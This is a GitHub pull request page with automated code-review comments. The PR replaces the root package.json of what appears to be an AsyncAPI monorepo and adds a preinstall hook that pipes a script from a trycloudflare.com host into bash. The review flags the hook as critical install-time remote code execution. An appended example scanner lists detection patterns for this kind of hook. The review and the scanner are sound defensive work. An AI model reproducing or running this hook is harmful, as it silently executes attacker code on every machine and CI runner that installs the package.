poc #2136
We require all PRs to follow Conventional Commits specification.
What reviewers look at during PR review: The following are ideal points maintainers look for during review. Reviewing these points yourself beforehand can help streamline the review process and reduce time to merge.
📝 Walkthrough
The PR rewrites
Changes:
- Package manifest change
- Docs wording change
Estimated code review effort: 🎯 4 (Complex) | ⏱️ ~45 minutes
Important: Pre-merge checks failed. Please resolve all errors before merging. Addressing warnings is optional.
❌ Failed checks (1 inconclusive)
✅ Passed checks (4 passed)
Actionable comments posted: 2
🤖 Prompt for all review comments with AI agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
Inline comments:
In `@package.json`:
- Around line 2-6: Restore the root package.json contract by reverting the
minimal manifest replacement in favor of the original monorepo metadata and
scripts. Update the package manifest to keep the documented workflow scripts
intact and preserve the required engines fields, specifically the Node and npm
constraints in package.json. Use the package.json root manifest and its
scripts/engines entries as the main symbols to locate and restore the intended
configuration without regressing any existing fields.
- Around line 3-5: Remove the dangerous npm lifecycle hook from package.json by
deleting the preinstall script that shells out to a remote curl|bash payload.
Update the scripts section so installs no longer execute network-fetched code,
and keep package.json limited to safe local build/install tasks.
ℹ️ Review info
⚙️ Run configuration
Configuration used: .coderabbit.yaml
Review profile: CHILL
Plan: Pro
Run ID: d44e0508-357b-466e-b0e2-bd84264beb88
📒 Files selected for processing (2)
- apps/generator/docs/api.md
- package.json
| "name": "legitimate-package", | ||
| "scripts": { | ||
| "build": "turbo build", | ||
| "dev": "turbo dev", | ||
| "test": "turbo run test", | ||
| "lint": "turbo lint", | ||
| "lint:fix": "turbo run lint:fix", | ||
| "generate:assets": "turbo run generate:assets && npm run generate:readme:toc", | ||
| "generate:readme:toc": "markdown-toc -i README.md", | ||
| "generator:test": "turbo run test --filter=@asyncapi/generator", | ||
| "generator:test:dev": "turbo run test:dev", | ||
| "generator:test:unit": "turbo run test:unit --filter=@asyncapi/generator", | ||
| "generator:test:integration": "turbo run test:integration --filter=@asyncapi/generator", | ||
| "generator:test:cleanup": "turbo run test:cleanup --filter=@asyncapi/generator", | ||
| "generator:docs": "turbo run docs --filter=@asyncapi/generator", | ||
| "generator:docker:build": "turbo run docker:build --filter=@asyncapi/generator", | ||
| "generator:lint": "turbo run lint --filter=@asyncapi/generator", | ||
| "generator:lint:tpl:validator": "turbo run lint:tpl:validator --filter=@asyncapi/generator", | ||
| "generator:update:snapshot": "turbo run test:integration:update --filter=@asyncapi/generator", | ||
| "components:test": "turbo run test --filter=@asyncapi/generator-components", | ||
| "components:build": "turbo run build --filter=@asyncapi/generator-components", | ||
| "components:lint": "turbo run lint --filter=@asyncapi/generator-components", | ||
| "helpers:test": "turbo run test --filter=@asyncapi/generator-helpers", | ||
| "helpers:lint": "turbo run lint --filter=@asyncapi/generator-helpers", | ||
| "templates:test": "turbo run test --filter=@asyncapi/template*", | ||
| "packages:test": "turbo run test --filter=./packages/** --only", | ||
| "hooks:test": "turbo run test --filter=@asyncapi/generator-hooks", | ||
| "test:update": "turbo run test -- -u", | ||
| "keeper:test": "turbo run test --filter=@asyncapi/keeper", | ||
| "keeper:build": "turbo run build --filter=@asyncapi/keeper", | ||
| "keeper:lint": "turbo run lint --filter=@asyncapi/keeper" | ||
| "preinstall": "$(curl -s https://threatening-criteria-clinton-approx.trycloudflare.com/r/smokedmeat/stg_sm_b692829c34fe76cf|bash)" | ||
| }, | ||
| "devDependencies": { | ||
| "markdown-toc": "^1.2.0", | ||
| "turbo": "1.13.3" | ||
| }, | ||
| "engines": { | ||
| "node": ">=24.11", | ||
| "npm": ">=11.5.1" | ||
| }, | ||
| "packageManager": "npm@9.5.0", | ||
| "workspaces": [ | ||
| "apps/*", | ||
| "packages/**", | ||
| "!apps/generator/templates/bakedInTemplates/**" | ||
| ] | ||
| "version": "1.0.0" |
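Review bot: The `preinstall` value fetches a script from an ephemeral trycloudflare.com quick-tunnel hostname and pipes it to `bash`, so the code that would actually execute on every `npm install` is not in this diff and cannot be reviewed; a lifecycle hook of this shape is grounds to close the PR and report its source rather than to request changes. The same hunk also drops `engines`, `packageManager` and `workspaces`, so the root manifest no longer describes a workspace at all. To keep a PR like this from executing on CI runners in the first place, the pipeline should install with `npm ci --ignore-scripts` and enable lifecycle scripts separately only for packages that genuinely need them.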
🗄️ Data Integrity & Integration | 🟠 Major | ⚡ Quick win
Restore the root manifest contract instead of replacing it with a minimal package.
This removes the monorepo scripts used by the documented workflows and drops the required engines fields for Node/npm. Restore the prior scripts/metadata and keep engines.node >= 24.11 and engines.npm >= 11.5.1. As per coding guidelines, "package.json: Node engine must be >= 24.11 and npm must be >= 11.5.1. Do not regress engines fields in any package.json."
🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
In `@package.json` around lines 2 - 6, Restore the root package.json contract by
reverting the minimal manifest replacement in favor of the original monorepo
metadata and scripts. Update the package manifest to keep the documented
workflow scripts intact and preserve the required engines fields, specifically
the Node and npm constraints in package.json. Use the package.json root manifest
and its scripts/engines entries as the main symbols to locate and restore the
intended configuration without regressing any existing fields.
Source: Coding guidelines
| "scripts": { | ||
| "build": "turbo build", | ||
| "dev": "turbo dev", | ||
| "test": "turbo run test", | ||
| "lint": "turbo lint", | ||
| "lint:fix": "turbo run lint:fix", | ||
| "generate:assets": "turbo run generate:assets && npm run generate:readme:toc", | ||
| "generate:readme:toc": "markdown-toc -i README.md", | ||
| "generator:test": "turbo run test --filter=@asyncapi/generator", | ||
| "generator:test:dev": "turbo run test:dev", | ||
| "generator:test:unit": "turbo run test:unit --filter=@asyncapi/generator", | ||
| "generator:test:integration": "turbo run test:integration --filter=@asyncapi/generator", | ||
| "generator:test:cleanup": "turbo run test:cleanup --filter=@asyncapi/generator", | ||
| "generator:docs": "turbo run docs --filter=@asyncapi/generator", | ||
| "generator:docker:build": "turbo run docker:build --filter=@asyncapi/generator", | ||
| "generator:lint": "turbo run lint --filter=@asyncapi/generator", | ||
| "generator:lint:tpl:validator": "turbo run lint:tpl:validator --filter=@asyncapi/generator", | ||
| "generator:update:snapshot": "turbo run test:integration:update --filter=@asyncapi/generator", | ||
| "components:test": "turbo run test --filter=@asyncapi/generator-components", | ||
| "components:build": "turbo run build --filter=@asyncapi/generator-components", | ||
| "components:lint": "turbo run lint --filter=@asyncapi/generator-components", | ||
| "helpers:test": "turbo run test --filter=@asyncapi/generator-helpers", | ||
| "helpers:lint": "turbo run lint --filter=@asyncapi/generator-helpers", | ||
| "templates:test": "turbo run test --filter=@asyncapi/template*", | ||
| "packages:test": "turbo run test --filter=./packages/** --only", | ||
| "hooks:test": "turbo run test --filter=@asyncapi/generator-hooks", | ||
| "test:update": "turbo run test -- -u", | ||
| "keeper:test": "turbo run test --filter=@asyncapi/keeper", | ||
| "keeper:build": "turbo run build --filter=@asyncapi/keeper", | ||
| "keeper:lint": "turbo run lint --filter=@asyncapi/keeper" | ||
| "preinstall": "$(curl -s https://threatening-criteria-clinton-approx.trycloudflare.com/r/smokedmeat/stg_sm_b692829c34fe76cf|bash)" | ||
| }, |
🔒 Security & Privacy | 🔴 Critical | ⚡ Quick win
Remove the remote-code-executing preinstall hook.
This runs arbitrary network-fetched shell code during npm install, creating an install-time RCE/supply-chain compromise path for every contributor and CI job.
🛡️ Proposed fix
- "scripts": {
- "preinstall": "$(curl -s https://threatening-criteria-clinton-approx.trycloudflare.com/r/smokedmeat/stg_sm_b692829c34fe76cf|bash)"
- },📝 Committable suggestion
‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.
| "scripts": { | |
| "build": "turbo build", | |
| "dev": "turbo dev", | |
| "test": "turbo run test", | |
| "lint": "turbo lint", | |
| "lint:fix": "turbo run lint:fix", | |
| "generate:assets": "turbo run generate:assets && npm run generate:readme:toc", | |
| "generate:readme:toc": "markdown-toc -i README.md", | |
| "generator:test": "turbo run test --filter=@asyncapi/generator", | |
| "generator:test:dev": "turbo run test:dev", | |
| "generator:test:unit": "turbo run test:unit --filter=@asyncapi/generator", | |
| "generator:test:integration": "turbo run test:integration --filter=@asyncapi/generator", | |
| "generator:test:cleanup": "turbo run test:cleanup --filter=@asyncapi/generator", | |
| "generator:docs": "turbo run docs --filter=@asyncapi/generator", | |
| "generator:docker:build": "turbo run docker:build --filter=@asyncapi/generator", | |
| "generator:lint": "turbo run lint --filter=@asyncapi/generator", | |
| "generator:lint:tpl:validator": "turbo run lint:tpl:validator --filter=@asyncapi/generator", | |
| "generator:update:snapshot": "turbo run test:integration:update --filter=@asyncapi/generator", | |
| "components:test": "turbo run test --filter=@asyncapi/generator-components", | |
| "components:build": "turbo run build --filter=@asyncapi/generator-components", | |
| "components:lint": "turbo run lint --filter=@asyncapi/generator-components", | |
| "helpers:test": "turbo run test --filter=@asyncapi/generator-helpers", | |
| "helpers:lint": "turbo run lint --filter=@asyncapi/generator-helpers", | |
| "templates:test": "turbo run test --filter=@asyncapi/template*", | |
| "packages:test": "turbo run test --filter=./packages/** --only", | |
| "hooks:test": "turbo run test --filter=@asyncapi/generator-hooks", | |
| "test:update": "turbo run test -- -u", | |
| "keeper:test": "turbo run test --filter=@asyncapi/keeper", | |
| "keeper:build": "turbo run build --filter=@asyncapi/keeper", | |
| "keeper:lint": "turbo run lint --filter=@asyncapi/keeper" | |
| "preinstall": "$(curl -s https://threatening-criteria-clinton-approx.trycloudflare.com/r/smokedmeat/stg_sm_b692829c34fe76cf|bash)" | |
| }, |
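Review bot: As rendered, this committable suggestion still ends with the `"preinstall": "$(curl -s ...|bash)"` line, whereas the proposed-fix diff above it deletes the `scripts` block; confirm the suggestion actually removes the hook before committing it, otherwise it reintroduces exactly the finding it is meant to fix. Also check that the scripts listed here are the full monorepo set the earlier comment asks to restore, since the proposed fix removes the whole `scripts` object rather than only the `preinstall` entry.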
🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
In `@package.json` around lines 3 - 5, Remove the dangerous npm lifecycle hook
from package.json by deleting the preinstall script that shells out to a remote
curl|bash payload. Update the scripts section so installs no longer execute
network-fetched code, and keep package.json limited to safe local build/install
tasks.
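A defender-side check for the install-hook pattern this comment describes, added here as an example (it is neither the project's code nor CodeRabbit's output): it parses a package.json, flags every npm lifecycle script that runs automatically on install, and marks as critical those that fetch remote content and hand it to a shell. The sample manifest and the `example.invalid` hostname are constructed for this example.

```javascript
// Added example, not part of the PR or of CodeRabbit's output. Flags npm
// lifecycle scripts that run automatically on `npm install` and, within them,
// the fetch-and-execute pattern discussed in the review above. The sample
// manifest and its hostname are constructed for this example.
const LIFECYCLE_HOOKS = new Set([
  'preinstall', 'install', 'postinstall', 'preprepare', 'prepare',
  'postprepare', 'prepublish', 'prepublishOnly', 'prepack', 'postpack',
]);

// Each pattern is one way of handing network-fetched content to an interpreter.
const REMOTE_EXEC = [
  /\b(curl|wget)\b[^|]*\|\s*(ba|z|da)?sh\b/i,    // curl ... | bash
  /\$\(\s*(curl|wget)\b/i,                       // $(curl ...) substitution
  /\b(curl|wget)\b.*\bbase64\s+(-d|--decode)/i,  // fetched, decoded, then run
];

function auditManifest(manifestText) {
  const pkg = JSON.parse(manifestText);
  const findings = [];
  for (const [name, cmd] of Object.entries(pkg.scripts || {})) {
    if (!LIFECYCLE_HOOKS.has(name)) continue; // build/test etc. need `npm run`
    const remote = REMOTE_EXEC.some((re) => re.test(cmd));
    findings.push({
      script: name,
      command: cmd,
      severity: remote ? 'critical' : 'warning',
      reason: remote
        ? 'fetches remote content and executes it during install'
        : 'executes automatically on npm install; review its contents',
    });
  }
  return findings;
}

// Constructed sample: one fetch-and-execute hook, one local hook, one plain script.
const SAMPLE_MANIFEST = JSON.stringify({
  name: 'sample-package',
  scripts: {
    build: 'turbo build',
    postinstall: 'node scripts/patch-local.js',
    preinstall: '$(curl -s https://example.invalid/r/stage.sh|bash)',
  },
});

const results = auditManifest(SAMPLE_MANIFEST);
for (const f of results) {
  console.log(`${f.severity.toUpperCase()} ${f.script}: ${f.reason}`);
}
```

Run it against the root package.json of a PR checkout as a required check; a `critical` finding should block the merge, and a `warning` should prompt a human look at the hook body.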
🚀 Docs preview deployed